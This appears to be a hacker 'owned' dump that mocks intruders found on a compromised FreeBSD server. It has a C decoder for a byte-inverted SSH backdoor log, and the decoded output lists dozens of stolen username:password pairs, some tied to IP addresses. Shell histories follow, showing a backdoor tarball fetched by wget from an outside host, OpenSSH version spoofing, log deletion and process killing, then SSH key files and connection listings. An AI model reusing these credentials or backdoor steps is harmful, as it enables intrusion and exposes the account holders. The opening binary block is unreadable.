Ņš›žЍ�<3B><><EFBFBD>ƟŒ‹šŋœ‡’ύύ�<3B><><EFBFBD>Ɵœž……φʎŜ˅…†΍œ›�<3B><><EFBFBD>Ɵž<3B><>ŏž<3B><>“”ž�<3B><><EFBFBD>Ɵž<3B><>ŏž<3B><>“”ž�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵœ—ž<3B>Œυ’žЎ͋—�<3B><><EFBFBD>ƟŒ’žŒ—őΘˆ—ύš�<3B><><EFBFBD>Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�<3B><><EFBFBD>Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�<3B><><EFBFBD>Ɵ<3B>–’<3B>–‘•˜ƎŒŒ˜†ϥ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ<3B>–’<3B>–‘•˜ƎŒŒ˜†ϥ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ<3B>“”˜<3B>ž…Ƒ<3B>“–‘›ϑ�<3B><><EFBFBD>Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�<3B><><EFBFBD>Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵž“š‡<3B><>ő<3B>–…ž<3B>‹š�<3B><><EFBFBD><EFBFBD>ƟχǑϋҍЊҋΟ•Š‘–<3B><>ƎΌ�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�<3B><><EFBFBD>Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�<3B><><EFBFBD>Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵœ—ž<3B>Œυ’žЎ͋—�<3B><><EFBFBD>Ɵ’ž‹‹Ņš›žЍ�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�<3B><><EFBFBD>Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�<3B><><EFBFBD>Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�<3B><><EFBFBD>Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�<3B><><EFBFBD>Ɵœ—ž<3B>Œυ’žЎ͋—�<3B><><EFBFBD>Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�<3B><><EFBFBD>Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ†žŽŠ–ŒŜ“<3B>Œš<3B>š<3B>“†̊ʵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƟχǑϋҍЊҋΟ•Š‘–<3B><>ƎΌ�<3B><><EFBFBD><EFBFBD>ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ<3B>ȵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD><EFBFBD>ƟLJҎǍҍ̉҈Пœ†œ“šŋЏ<3B>ȵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƟLJҎǍҍ̉҈ПŒ’žŒ—őΘˆ—ύš�<3B><><EFBFBD><EFBFBD>ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ<3B>ȵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD><EFBFBD>ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ<3B>ȵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƟχǑϋҍЊҋΟ•Š‘–<3B><>ƎΌ�<3B><><EFBFBD><EFBFBD>ƟχǑϋҍЊҋΟ•Š‘–<3B><>ƎΌ�<3B><><EFBFBD><EFBFBD>ƟLJҎǍҍ̉҈ПŒ’žŒ—őΘˆ—ύš�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ†žŽŠ–ŒŜ“<3B>Œš<3B>š<3B>“†̊ʵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƟȆҋʑϏБΊΟœ†œ“šŋЏ“ȵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƟȆҋʑϏБΊΟœ†œ“šŋЏ<3B>ȵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ɵœ—ž<3B>Œυ’žЎ͋—�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ†žŽŠ–ŒŜ“<3B>Œš<3B>š<3B>“†̊ʵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ɵ†žŽŠ–ŒŜ“<3B>Œš<3B>š<3B>“†̊ʵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƟʈҍΊҎ̍҆ȟχ̞<3B>ˆ‘‹ō<3B><>œ<3B>ӊ˥<3B>�<3B><><EFBFBD><EFBFBD>ƟLJҎ΋Ҏɉ҈ʟœ†<3B>š<3B>ŋЏ<3B>ȵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƟȆҋʑϏБΊΟœ†<3B>š<3B>ŋЏ“ȵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ“ȵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ<3B>ȵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵœ—ž<3B>Œυ’žЎ͋—�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD><EFBFBD>ƟȆҋʑϏБΊΟœ†œ“šŋЏ<3B>ȵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƟʈҍΊҎ̍҆ȟχ̞<3B>ˆ‘‹ō<3B><>œ<3B>ӊ˥<3B>�<3B><><EFBFBD>Ɵœ—ž<3B>Œυ’žЎ͋—�<3B><><EFBFBD>Ɵ–<3B><>“š‡Ŷ֞<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>�<3B><><EFBFBD>Ɵ”<3B>Šž<3B><>žŞŒ“ŒІΌ�<3B><><EFBFBD>Ɵœ’’Ō”†“–‘͵<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ɵœ—ž<3B>Œυ’žЎ͋—�<3B><><EFBFBD><EFBFBD>ƟȆҋʑϏБΊΟœ†œ“šŋϳȵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƟȆҋʑϏБΊΟœ†œ“šŋЏ<3B>ȵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƟȆҋʑϏБΊΟœ†œ“šŋЏ<3B>ȵ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ɵ<3B>–’<3B>–‘•˜ƎŒŒ˜†ϥ<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>󋈍
|
||
|
||
|
||
|
||
[root@velocity:/var/run]# cat lame.c
|
||
#include <stdio.h>
|
||
|
||
int main(int argc, char *argv[])
|
||
{
|
||
FILE *n00bfile;
|
||
unsigned int lamechar;
|
||
if(argc < 2)
|
||
printf("Usage: %s filename\n",argv[0]);
|
||
if((n00bfile = fopen(argv[1],"r"))) {
|
||
while((lamechar = fgetc(n00bfile)) != EOF) {
|
||
printf("%c",~lamechar);
|
||
}
|
||
fclose(n00bfile);
|
||
}
|
||
return 0;
|
||
}
|
||
|
||
// Let's try out our complex decryption program..
|
||
|
||
[root@velocity:/var/run]# gcc -o lame lame.c
|
||
[root@velocity:/var/run]# rm lame.c
|
||
[root@velocity:/var/run]# ./lame ssh.old
|
||
HOOKIN: romeo:bu9fjogr
|
||
HOOKIN: pimpinjg:1ssgy0ZACGUZFS // Our luvbirdz once again.. This time hidding..:)
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: cpu:lloverAa1
|
||
HOOKIN: cpu:lloverAa1
|
||
HOOKIN: chaos1:ma012th
|
||
HOOKIN: yaquis:closereply456
|
||
HOOKIN: smash:n1gwh0re
|
||
HOOKOUT: 98.124.176.76 cycle:t00L8
|
||
HOOKOUT: 98.192.246.70 lag:droppinshitlikeanalien
|
||
HOOKOUT: 98.192.246.70 lag:droppinshitlikeanalien
|
||
HOOKOUT: 98.192.246.70 l:droppinshitlikeanalien
|
||
HOOKOUT: 98.192.246.70 lag:vanity09
|
||
HOOKOUT: 98.192.246.70 lag:vanity09
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: matt:zeda02
|
||
HOOKIN: matt:zeda02
|
||
HOOKIN: matt:zeda02
|
||
HOOKIN: matt:zeda02
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: matt:zeda02
|
||
HOOKIN: yaquis:closereply456
|
||
HOOKIN: psycoz:jelesuis
|
||
HOOKIN: psycoz:jelesuis
|
||
HOOKIN: yaquis:closereply456
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: yaquis:closereply456
|
||
HOOKIN: kruapra:asls0923
|
||
HOOKIN: omgwtf:nokiaz
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: yaquis:closereply456
|
||
HOOKIN: matt:zeda02
|
||
HOOKIN: matt:zeda02
|
||
HOOKIN: matt:zeda02
|
||
HOOKIN: ste:tcxm1212
|
||
HOOKIN: cazz1961:c4zzy1rcd
|
||
HOOKIN: apo:parolka
|
||
HOOKIN: apo:parolka
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: chaos1:ma012th
|
||
HOOKIN: smash:n1gwh0re
|
||
HOOKIN: katsst:ch0w$ie
|
||
HOOKIN: katsst:ch0w$ie
|
||
HOOKIN: pimpinjg:1ssgy0ZACGUZFS
|
||
HOOKIN: pimpinjg:1ssgy0ZACGUZFS
|
||
HOOKIN: blkgraz:.Blind1.
|
||
HOOKIN: katsst:ch0w$ie
|
||
HOOKIN: katsst:ch0w$ie
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: alexbb:noizarte
|
||
HOOKOUT: 189.14.205.42 junior:123
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: katsst:ch0w$ie
|
||
HOOKIN: katsst:ch0w$ie
|
||
HOOKIN: katsst:ch0w$ie
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: chaos1:ma012th
|
||
HOOKIN: matt:zeda02
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: katsst:ch0w$ie
|
||
HOOKIN: katsst:ch0w$ie
|
||
HOOKIN: katsst:ch0w$ie
|
||
HOOKIN: katsst:ch0w$ie
|
||
HOOKIN: chaos1:ma012th
|
||
HOOKIN: katsst:ch0w$ie
|
||
HOOKIN: katsst:ch0w$ie
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: yaquis:closereply456
|
||
HOOKOUT: 189.14.205.42 junior:123
|
||
HOOKOUT: 98.124.176.76 cycle:t00L8
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKOUT: 98.192.246.70 cycle:t00L8
|
||
HOOKOUT: 98.192.246.70 smash:n1gwh0re
|
||
HOOKOUT: 98.124.176.76 cycle:t00L8
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKOUT: 98.124.176.76 cycle:t00L8
|
||
HOOKOUT: 189.14.205.42 junior:123
|
||
HOOKOUT: 189.14.205.42 junior:123
|
||
HOOKOUT: 98.192.246.70 smash:n1gwh0re
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: yaquis:closereply456
|
||
HOOKOUT: 89.46.100.252 cycle:t00l8
|
||
HOOKOUT: 89.46.100.252 cycle:t00L8
|
||
HOOKIN: chaos1:ma012th
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: yaquis:closereply456
|
||
HOOKIN: yaquis:closereply456
|
||
HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ // puma.makosolutions.com
|
||
HOOKOUT: 98.124.176.76 cyber:t00L8
|
||
HOOKOUT: 89.46.100.252 cyber:t00l8
|
||
HOOKOUT: 98.124.176.76 cycle:t00l8
|
||
HOOKOUT: 98.124.176.76 cycle:t00L8
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: chaos1:ma012th
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKOUT: 89.46.100.252 cycle:t00L8
|
||
HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ // puma.makosolutions.com
|
||
HOOKIN: chaos1:ma012th
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: kruapra:asls0923
|
||
HOOKIN: cmm:skylin3
|
||
HOOKIN: chaos1:ma012th
|
||
HOOKOUT: 89.46.100.252 cycle:t0L8
|
||
HOOKOUT: 89.46.100.252 cycle:t00L8
|
||
HOOKOUT: 89.46.100.252 cycle:t00L8
|
||
HOOKIN: pimpinjg:1ssgy0ZACGUZFS
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: katsst:ch0w$ie
|
||
HOOKIN: yaquis:closereply456
|
||
HOOKIN: smash:n1gwh0re
|
||
HOOKIN: smash:n1gwh0re
|
||
HOOKIN: smash:n1gwh0re
|
||
HOOKIN: smash:n1gwh0re
|
||
HOOKIN: katsst:ch0w$ie
|
||
HOOKIN: yaquis:closereply456
|
||
HOOKIN: yaquis:closereply456
|
||
HOOKIN: ioplex:I*!@ONLINE
|
||
HOOKIN: pimpinjg:1ssgy0ZACGUZFS
|
||
HOOKIN: katsst:ch0w$ie
|
||
HOOKIN: blkgraz:.Blind1.
|
||
HOOKIN: blkgraz:.Blind1.
|
||
HOOKIN: blkgraz:.Blind1.
|
||
HOOKIN: blkgraz:.Blind1.
|
||
HOOKOUT: 89.46.100.252 cycle:t00L8
|
||
[root@velocity:/var/run]#
|
||
|
||
// 0wn3d by y0ur 0wn backd00r..
|
||
|
||
|
||
[root@velocity:~]# cat /etc/profile
|
||
# $FreeBSD: src/etc/profile,v 1.14 2004/06/06 11:46:27 schweikh Exp $
|
||
#
|
||
# System-wide .profile file for sh(1).
|
||
#
|
||
# Uncomment this to give you the default 4.2 behavior, where disk
|
||
# information is shown in K-Blocks
|
||
# BLOCKSIZE=K; export BLOCKSIZE
|
||
#
|
||
# For the setting of languages and character sets please see
|
||
# login.conf(5) and in particular the charset and lang options.
|
||
# For full locales list check /usr/share/locale/*
|
||
# You should also read the setlocale(3) man page for information
|
||
# on how to achieve more precise control of locale settings.
|
||
#
|
||
# Read system messages
|
||
# msgs -f
|
||
# Allow terminal messages
|
||
# mesg y
|
||
export PS1="[\u@\h:\w]\\$ "
|
||
alias ls='/bin/ls -GFa'
|
||
alias ll='/bin/ls -GFal'
|
||
alias lo='/bin/ls -GFalo'
|
||
export LSCOLORS=ExGxFxf5CxfgDxabagacad
|
||
export EDITOR=pico
|
||
TMOUT=1800
|
||
|
||
export HISTFILE=~/.bshrc // Bypassing backdoor HISTFILE=/dev/null
|
||
export HISTSIZE=1500
|
||
|
||
[root@velocity:~]#
|
||
|
||
// After a while...
|
||
|
||
[root@velocity:~]# cat /root/.bshrc
|
||
w
|
||
rm -rf hax
|
||
rm -rf lol.tar.gz
|
||
ls -la
|
||
exit
|
||
w
|
||
wget http://board.whois.co.kr/lol.tar.gz // See attachments section for lol.tar.gz backdoor
|
||
tar -zxf lol.tar.gz
|
||
cd hax
|
||
ls -la
|
||
ssh -v
|
||
vi version.h // OpenSSH Version editing
|
||
./quick // Installation
|
||
cd ..
|
||
ls -la
|
||
cd /home/romeo/
|
||
ls -la
|
||
cat .bash_history
|
||
ls -la
|
||
cd .irssi/
|
||
ls -la
|
||
rm -rf away.log // Too late..
|
||
cd ..
|
||
ls -la
|
||
w
|
||
ps aux | grep ssh
|
||
netstat -an | grep :22 // See the remaining 18 netstats.. not counting who and kills..
|
||
netstat -an | grep 22
|
||
netstat -an | grep ssh
|
||
netstat -a | grep 22
|
||
netstat -an | grep .22
|
||
env
|
||
netstat -an | grep 188.51.85.13
|
||
netstat -an | grep 248.22
|
||
w
|
||
netstat -anp | grep 248.22
|
||
netstat -an | grep 248.22
|
||
whois 98.242.244.25
|
||
ps aux | grep ssh
|
||
kill -9 8095
|
||
kill -9 8128
|
||
kill -9 8866
|
||
ps aux | grep ssh
|
||
kill -9 92546
|
||
kill -9 93418
|
||
w
|
||
env
|
||
netstat -an | grep 188.51.85.13
|
||
netstat -an | grep .248.22
|
||
w
|
||
ls -al
|
||
cat > w
|
||
sh x
|
||
sh w
|
||
ls -la
|
||
bas w
|
||
bash w
|
||
ls -la
|
||
cat w
|
||
netstat -tanp
|
||
ps aux | grep ssh
|
||
kill -9 43929
|
||
kill -9 75936
|
||
kill -9 75934
|
||
ps aux | grep ssh
|
||
kll -9 23783
|
||
kill -9 23783
|
||
ps aux | grep ssh
|
||
time
|
||
date
|
||
ls -la
|
||
chmod +x w
|
||
./w
|
||
ls -la
|
||
rm -f w
|
||
ps aux | grep ssh
|
||
kill -9 22353
|
||
ps aux | grep ssh
|
||
kill -9 9078
|
||
ps aux | grep ssh
|
||
env
|
||
netstat -an | grep 188.51.85.13
|
||
netstat -an | grep .248.22
|
||
csf
|
||
last | grep 98.242.244.25
|
||
lastlog
|
||
w
|
||
ls -la
|
||
netstat -anp tcp
|
||
netstat -anp tcp | grep .22
|
||
netstat -anp tcp | grep 72.20.28.226.6697
|
||
netstat -anp
|
||
netstat -anp tcp
|
||
sockstat
|
||
ps aux | grep ioplex
|
||
exit
|
||
w
|
||
cd ~pimpinjg/
|
||
ls -la
|
||
cat .bash_history
|
||
w
|
||
ls -la
|
||
cd /
|
||
ls -la
|
||
cd /tmp
|
||
ls -la
|
||
cd /var/log
|
||
ls -la
|
||
tail -f messages
|
||
cat security | grep romeo
|
||
cat security | grep root
|
||
w
|
||
cd ~romeo
|
||
ls -la
|
||
cat .bash_history
|
||
ps aux | grep romeo
|
||
ps aux | grep romeo
|
||
ps aux | grep ssh
|
||
w
|
||
ls -la
|
||
w
|
||
ls -la
|
||
ps aux
|
||
ps aux | grep irc
|
||
ping velocity.vitalspeeds.com
|
||
[root@velocity:~]#
|
||
|
||
/*
|
||
RoMe0 in panic mode.. netstat.. netstat.. netstat..
|
||
Thank you for all the fish.. n00bfish..
|
||
*/
|
||
|
||
[root@velocity:~]# cat /usr/home/pimpinjg/.bshrc
|
||
nano .bashrc
|
||
clear
|
||
ls
|
||
grep -r motd
|
||
grep -r motd *
|
||
clear
|
||
rm -rf znc*
|
||
clear
|
||
ls
|
||
clear
|
||
PS1='\033[1;32m\]\033[1;30m\][\033[1;32m\]root\[\033[1;30m\]@\[\033[1;32m\]\h\[\033[1;30m\]]:[\033[1;32m\]\w\[\033[1;30m\]]\[\033[1;30m\]\$\[\033[0m\] '
|
||
clear
|
||
uptime
|
||
ps aux
|
||
ls -al
|
||
uptime
|
||
clear
|
||
ls
|
||
nano .profile
|
||
nano .bashprompt
|
||
exit
|
||
clear
|
||
screen -r
|
||
clear
|
||
exit
|
||
clear
|
||
screen -r
|
||
screen -r
|
||
clear
|
||
exit
|
||
[root@velocity:~]#
|
||
|
||
// Advanced Linux Administration Skillz.. The 2 years of extensive training finally paid off..
|
||
|
||
|
||
[root@velocity:~]# cat /usr/home/pimpinjg/.ssh/known_hosts
|
||
localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxLk6rsYWY3ASi1AXMnWKeEd9Tqdcw0P+v7gGKHjGUdcPQZ00S5xotswbKD4/XI3StqVkQLOrcOvDebZ7uJjSpW/d7G1BeMdav8QjS+Q/Hxk8tzPPI+95/iviCW3dQbtxOEdXwcgTucw7d4GaGqexScbG+kOYzGc6ZZxSKJlqiM29s6ri1kfLDay/5/YZnz3Ms3081Hsxnrdbb0TOrpOJdbirgL4Ipe0DBaf1d/QQxGf6CFTbFKsm4RWuQWICiF7AFmHqgElMUYodjnDTmJjwjFbIipUsPvEjNabuYXHkUaA2iOYvpso13HdgYVdgJpFc269L435Uh4XBolEziEnrWQ==
|
||
72.20.28.205 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxLk6rsYWY3ASi1AXMnWKeEd9Tqdcw0P+v7gGKHjGUdcPQZ00S5xotswbKD4/XI3StqVkQLOrcOvDebZ7uJjSpW/d7G1BeMdav8QjS+Q/Hxk8tzPPI+95/iviCW3dQbtxOEdXwcgTucw7d4GaGqexScbG+kOYzGc6ZZxSKJlqiM29s6ri1kfLDay/5/YZnz3Ms3081Hsxnrdbb0TOrpOJdbirgL4Ipe0DBaf1d/QQxGf6CFTbFKsm4RWuQWICiF7AFmHqgElMUYodjnDTmJjwjFbIipUsPvEjNabuYXHkUaA2iOYvpso13HdgYVdgJpFc269L435Uh4XBolEziEnrWQ==
|
||
189.14.205.42 ssh-dss AAAAB3NzaC1kc3MAAACBAJgf4VlHspyNWVtAQpi0Lsf78P5bted4NBEAk0MX6w0DNnomC1/kiqOa2pNeZSB05NT42z8+Pxc2a5JwNRolfbpRXPMvMvHYwDMsZAYerz6KOc04nwVskMLBP47bBV6IMbJf2DV7OMBuZI4Li7QfAyW/qJpwUnctChFjSscyv+srAAAAFQDiHNMyrvXk8AJkeKusaJ9vUGdtJwAAAIBr1lDX9MHqMpoeZFE3vX6VbrPfBqK5Zm0EgdSf9QdbGFVD5YcLQhyc88jsrR2sCUBNmQN9hV8o7NedqAFQK1RKToN7ZvrzuFNcOT+yO6/B1Z2WniNojmrbd7/27dJCQz02yXl96f1pFUUcU7gRMdgI9WngNqOE8ZMl3B/jw/MwuAAAAIAoMJDeUlKhowiywrlFC511AfRe+5KfhqK2ohhKne1yr4r5fBrVeTsZeN39qeu23dUOTc7xXP47Iu7STxF7vX6Jw29OWx9vytwbCGNHPMr1kTgRr9n+lHutOZmCqvag2rALA8gs+KUfYrwdUs1p7PDVuTO8bk4HRSPs9wCQnlmpOg==
|
||
|
||
[root@velocity:~]# cat /usr/home/pimpinjg/.ssh/authorized_keys
|
||
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAn6d6bVIeir4IWs3b8F8kUfiaHKXZ+4nwuQpRMaoI67rqY8Tmjp5oFgT7CeRCIF0GUXAjY3my4T3GcV0ed+/5ilyoC0NG5W/TAvF62IQpQop9apP8HBlyiOaHuXgNVbit6/1EUW4SvLWdUe8zNqTWPw0/qZ2eQAEH8E+cbqT8LYsNWsQI9tpcJykigRZF1TqjL6vJtbQLqSgr2Gdz1+Xv9wXKlxdHSLa5ay5VuEij6w6rUS7ZI9OoOqGA2NICjs008cOy3yhCVHh1V7I50rLoPZWBZa72VBPPMvqiJpHbcIP8+NaXnIeLoINnYsV3xk27lSDT0UBBHLQ5miaLnvEzgw== pimpinjg@mercedes.pimpinjg.ch
|
||
|
||
|
||
[root@velocity:/var/run]# lsof -i -n | grep ssh
|
||
sshd 19971 root 3u IPv6 0xcc1771d0 0t0 TCP *:ssh (LISTEN)
|
||
sshd 19971 root 4u IPv4 0xc585e000 0t0 TCP *:ssh (LISTEN)
|
||
|
||
sshd 23362 root 3u IPv4 0xca6ae570 0t0 TCP 72.20.28.248:ssh->188.51.85.13:57409 (ESTABLISHED)
|
||
sshd 23383 romeo 3u IPv4 0xca6ae570 0t0 TCP 72.20.28.248:ssh->188.51.85.13:57409 (ESTABLISHED)
|
||
|
||
sshd 28333 root 3u IPv4 0xc9fc4570 0t0 TCP 72.20.28.206:ssh->72.223.92.235:6345 (ESTABLISHED)
|
||
sshd 28335 yaquis 3u IPv4 0xc9fc4570 0t0 TCP 72.20.28.206:ssh->72.223.92.235:6345 (ESTABLISHED)
|
||
sshd 30593 root 3u IPv4 0xc97b93a0 0t0 TCP 72.20.28.204:ssh->75.84.149.5:1294 (ESTABLISHED)
|
||
sshd 30595 katsst 3u IPv4 0xc97b93a0 0t0 TCP 72.20.28.204:ssh->75.84.149.5:1294 (ESTABLISHED)
|
||
sshd 30595 katsst 10u IPv4 0xc5b901d0 0t0 TCP 72.20.3.98:63271->192.168.1.1:http (SYN_SENT)
|
||
sshd 30595 katsst 11u IPv4 0xc590eae0 0t0 TCP 72.20.3.98:60359->91.184.73.195:46464 (ESTABLISHED)
|
||
sshd 30595 katsst 12u IPv4 0xc94fc570 0t0 TCP 72.20.3.98:61645->79.66.132.125:44020 (ESTABLISHED)
|
||
sshd 30595 katsst 13u IPv4 0xc5eb2910 0t0 TCP 72.20.3.98:62162->192.168.1.1:http (SYN_SENT)
|
||
sshd 30595 katsst 14u IPv4 0xc996d000 0t0 TCP 127.0.0.1:58269->127.0.0.1:33282 (SYN_SENT)
|
||
sshd 30595 katsst 15u IPv4 0xc954e910 0t0 TCP 72.20.3.98:60168->72.185.123.4:6601 (ESTABLISHED)
|
||
sshd 30595 katsst 17u IPv4 0xc99f81d0 0t0 TCP 72.20.3.98:60170->66.245.139.243:53066 (ESTABLISHED)
|
||
sshd 30595 katsst 18u IPv4 0xca0c1570 0t0 TCP 72.20.3.98:60172->124.168.34.236:50666 (ESTABLISHED)
|
||
sshd 30595 katsst 19u IPv4 0xcaf02910 0t0 TCP 72.20.3.98:60173->130.212.54.5:28573 (ESTABLISHED)
|
||
sshd 30595 katsst 22u IPv4 0xc9dd9740 0t0 TCP 72.20.3.98:60180->173.22.219.92:64415 (ESTABLISHED)
|
||
sshd 30595 katsst 23u IPv4 0xc622c570 0t0 TCP 72.20.3.98:60178->173.54.28.183:22677 (ESTABLISHED)
|
||
sshd 30595 katsst 27u IPv4 0xca10bcb0 0t0 TCP 72.20.3.98:60183->79.101.217.199:55824 (ESTABLISHED)
|
||
sshd 30595 katsst 28u IPv4 0xcc5021d0 0t0 TCP 72.20.3.98:60188->92.72.182.81:50009 (ESTABLISHED)
|
||
sshd 30595 katsst 29u IPv4 0xcc3dd740 0t0 TCP 72.20.3.98:60189->65.26.34.13:23928 (ESTABLISHED)
|
||
sshd 30595 katsst 30u IPv4 0xc972b740 0t0 TCP 72.20.3.98:60190->87.80.43.167:49878 (ESTABLISHED)
|
||
sshd 30595 katsst 35u IPv4 0xca1413a0 0t0 TCP 72.20.3.98:60195->61.229.122.218:42282 (ESTABLISHED)
|
||
sshd 30595 katsst 38u IPv4 0xc61be910 0t0 TCP 72.20.3.98:60198->67.185.180.151:21366 (ESTABLISHED)
|
||
sshd 30595 katsst 42u IPv4 0xca1cb1d0 0t0 TCP 72.20.3.98:60202->81.246.198.243:21771 (ESTABLISHED)
|
||
sshd 30595 katsst 43u IPv4 0xc9db61d0 0t0 TCP 72.20.3.98:60203->71.228.40.165:13289 (ESTABLISHED)
|
||
sshd 30595 katsst 46u IPv4 0xc61bd3a0 0t0 TCP 72.20.3.98:60217->70.69.35.95:48486 (ESTABLISHED)
|
||
sshd 30595 katsst 49u IPv4 0xc92c6000 0t0 TCP 72.20.3.98:60224->24.245.45.179:56678 (ESTABLISHED)
|
||
